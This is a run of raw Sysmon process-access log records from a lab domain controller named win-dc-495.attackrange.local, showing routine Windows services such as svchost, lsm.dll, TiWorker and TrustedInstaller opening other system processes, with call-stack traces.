13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.601{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.601{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.601{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.601{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.601{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.601{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.398{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+
244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.398{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:
\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
